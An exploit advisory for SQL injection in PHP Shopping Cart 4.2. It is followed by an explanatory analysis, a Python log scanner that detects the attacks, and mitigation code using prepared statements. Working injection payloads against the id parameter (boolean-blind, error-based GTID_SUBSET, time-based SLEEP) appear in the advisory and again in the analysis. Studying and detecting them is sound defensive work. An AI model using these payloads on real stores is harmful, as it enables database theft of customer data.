PHP Shopping Cart 4.2 - Multiple-SQLi

Exploit Author: nu11secur1ty
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2024-01-29
## Title: PHP Shopping Cart-4.2 Multiple-SQLi
## Author: nu11secur1ty
## Date: 09/13/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/php-shopping-cart-script/#sectionPricing
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `id` parameter appears to be vulnerable to SQL injection attacks.
A single quote was submitted in the id parameter, and a database error
message was returned. Two single quotes were then submitted and the
error message disappeared. The attacker can easily steal all
information from the database of this web application!
WARNING! All of you: Be careful what you buy! This will be your responsibility!

[+]Payload:

Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: controller=pjFront&action=pjActionGetStocks&id=1') OR NOT 3795=3795-- sRcp&session_id=

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT (ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: controller=pjFront&action=pjActionGetStocks&id=1') AND (SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=

## Reproduce:
https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Shopping-Cart-4.2

## Proof and Exploit:
https://www.nu11secur1ty.com/2023/09/php-shopping-cart-42-multiple-sqli.html

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
nu11secur1ty <http://nu11secur1ty.com/>


PHP Shopping Cart 4.2: A Critical SQL Injection Vulnerability Exposed

On September 13, 2023, cybersecurity researcher nu11secur1ty disclosed a severe vulnerability in PHP Shopping Cart 4.2, a widely used e-commerce script developed by PHP Jabbers. This flaw, identified as Multiple-SQLi, exposes the application to a range of SQL injection attacks, allowing attackers to extract sensitive data from the underlying database with minimal effort.

Understanding the Vulnerability

The core issue lies in the id parameter within the controller=pjFront&action=pjActionGetStocks endpoint. This parameter is used to retrieve product stock information, but it is not properly sanitized or parameterized. As demonstrated in the proof-of-concept, submitting a single quote (') in the id field triggers a database error, confirming that user input is directly injected into SQL queries.


    controller=pjFront&action=pjActionGetStocks&id=1') OR NOT 3795=3795-- sRcp&session_id=

This payload is a boolean-based blind SQL injection: the attacker closes the quoted value with '), appends a condition whose truth value is known in advance (here NOT 3795=3795, which is false) and comments out the rest of the query with --. By comparing this response with the one returned for a true condition (e.g., a change in page content or behavior), the attacker learns whether the injected logic reached the database and can then ask the database arbitrary true/false questions. This method is particularly effective when the application does not display error messages directly to the user.

Exploitation Techniques

nu11secur1ty demonstrated three distinct exploitation techniques, each leveraging different characteristics of MySQL databases:

  • Error-based SQL Injection: This technique uses MySQL-specific functions like GTID_SUBSET() to force the database to generate error messages containing sensitive data. The payload below triggers such an error:

        controller=pjFront&action=pjActionGetStocks&id=1') AND GTID_SUBSET(CONCAT(0x71717a6b71,(SELECT(ELT(3820=3820,1))),0x7178627871),3820)-- kQZA&session_id=

    Here, CONCAT() wraps the result of the inner SELECT between two hex-encoded marker strings (0x71717a6b71 is qqzkq) and passes the result to GTID_SUBSET(), which rejects it and echoes the value in the error message. Whatever the inner SELECT returns therefore comes back to the attacker inside the error text, providing direct access to data.

  • Time-based Blind SQL Injection: This method relies on the SLEEP() function to delay query execution. If the database sleeps for 5 seconds, the attacker can infer that the injected condition is true:

        controller=pjFront&action=pjActionGetStocks&id=1') AND (SELECT 2625 FROM (SELECT(SLEEP(5)))nVyA)-- FGLs&session_id=

    By measuring the response time, attackers can deduce the truth of a condition, even when no direct output is available. This is particularly useful in environments where error messages are disabled.
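As an added defender's example (not part of the advisory or the analysis), the Python below scans Apache-style access-log lines for pjActionGetStocks requests whose id is not the plain integer the endpoint expects and labels them with the three payload classes described above. The log lines, client addresses and timestamps are constructed for the example.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlparse

# Constructed Apache-style access-log lines (not real traffic): one benign request and
# the three payload classes from the advisory, percent-encoded as a client sends them.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Sep/2023:10:01:02 +0000] "GET /index.php?controller=pjFront&action=pjActionGetStocks&id=17&session_id=abc HTTP/1.1" 200 512
10.0.0.9 - - [13/Sep/2023:10:01:07 +0000] "GET /index.php?controller=pjFront&action=pjActionGetStocks&id=1%27%29%20OR%20NOT%203795%3D3795--%20sRcp&session_id= HTTP/1.1" 200 498
10.0.0.9 - - [13/Sep/2023:10:01:09 +0000] "GET /index.php?controller=pjFront&action=pjActionGetStocks&id=1%27%29%20AND%20GTID_SUBSET%28CONCAT%280x71717a6b71%2C%28SELECT%20%28ELT%283820%3D3820%2C1%29%29%29%2C0x7178627871%29%2C3820%29--%20kQZA&session_id= HTTP/1.1" 500 231
10.0.0.9 - - [13/Sep/2023:10:01:15 +0000] "GET /index.php?controller=pjFront&action=pjActionGetStocks&id=1%27%29%20AND%20%28SELECT%202625%20FROM%20%28SELECT%28SLEEP%285%29%29%29nVyA%29--%20FGLs&session_id= HTTP/1.1" 200 498
"""
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Checked in order; each label is the payload class named in the advisory.
SIGNATURES = [
    (re.compile(r"\bSLEEP\s*\(", re.I), "time-based blind"),
    (re.compile(r"\bGTID_SUBSET\s*\(", re.I), "error-based"),
    (re.compile(r"['\"]\)?\s*(?:OR|AND)\s+(?:NOT\s+)?\d+=\d+", re.I), "boolean-based blind"),
]

def classify_id(value: str) -> Optional[str]:
    """Label a decoded id value; None means it is the plain integer the endpoint expects."""
    if re.fullmatch(r"\d+", value):
        return None
    for pattern, label in SIGNATURES:
        if pattern.search(value):
            return label
    return "malformed id"  # not an integer, but no known signature either

def scan_log(log_text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, label) for every pjActionGetStocks request with a non-integer id."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        # parse_qs percent-decodes, so the regexes run against the SQL text the server saw
        qs = parse_qs(urlparse(m.group(1)).query, keep_blank_values=True)
        if qs.get("action") != ["pjActionGetStocks"]:
            continue
        for raw_id in qs.get("id", []):
            label = classify_id(raw_id)
            if label is not None:
                hits.append((line.split()[0], label))
    return hits

if __name__ == "__main__":
    for ip, label in scan_log(SAMPLE_LOG):
        print(f"{ip}\t{label}")
```

Because the rule starts from "id must be an integer" rather than from attack strings alone, obfuscated variants that evade the three signatures are still reported as a malformed id.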

Real-World Impact and Risk Assessment

Given that PHP Shopping Cart 4.2 is used by thousands of small to medium-sized businesses, the implications of this vulnerability are severe. An attacker can:

  • Extract customer data including names, email addresses, and payment details.
  • Access admin credentials stored in the database.
  • Modify or delete products, orders, or user records.
  • Perform privilege escalation by injecting commands to alter user roles.

As the vulnerability description warns: "Be careful what you buy! This will be your responsibility!" — a stark reminder that using unpatched software exposes organizations to significant data breaches.

Best Practices and Mitigation Strategies

For system administrators and penetration testers, this case highlights the importance of secure coding practices:

  • Input Sanitization: Use filter_var() or htmlspecialchars() to validate and sanitize user inputs before processing. Note that htmlspecialchars() encodes output for HTML and is not a defence against SQL injection on its own; prepared statements are.
  • Parameterized Queries: Replace direct SQL concatenation with prepared statements using PDO or mysqli_stmt_prepare().
  • Input Validation: Ensure id parameters are numeric and validated against a whitelist of known product IDs.
  • Error Handling: Disable error reporting in production environments using display_errors = Off in php.ini, so database errors are logged rather than returned to the client.

For developers, the following corrected code snippet demonstrates proper implementation:


// Corrected PHP code using PDO: the user-supplied id never becomes part of the SQL text
$id = filter_var($_GET['id'] ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
if ($id === false) {
    http_response_code(400);
    exit('Invalid product id');
}
try {
    // Throw on every driver error so the catch block below actually runs
    $pdo = new PDO("mysql:host=localhost;dbname=shop_db", "user", "pass",
                   [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    $stmt = $pdo->prepare("SELECT * FROM products WHERE id = ?");
    $stmt->execute([$id]);   // bound as data, not spliced into the query
    $result = $stmt->fetchAll(PDO::FETCH_ASSOC);
} catch (PDOException $e) {
    error_log("Database error: " . $e->getMessage());
    // Do not expose details to user
}

This approach eliminates the risk of SQL injection by separating the query logic from user input, ensuring that only valid data is processed.

Conclusion

The PHP Shopping Cart 4.2 vulnerability serves as a cautionary tale for developers and organizations relying on third-party scripts. Even seemingly minor flaws in input handling can lead to catastrophic data exposure. As cybersecurity threats evolve, it is imperative to:

  • Regularly audit and update software.
  • Implement secure coding standards.
  • Conduct penetration testing with tools like Burp Suite or sqlmap.

By adopting proactive security measures, businesses can protect their customers, maintain trust, and avoid costly breaches.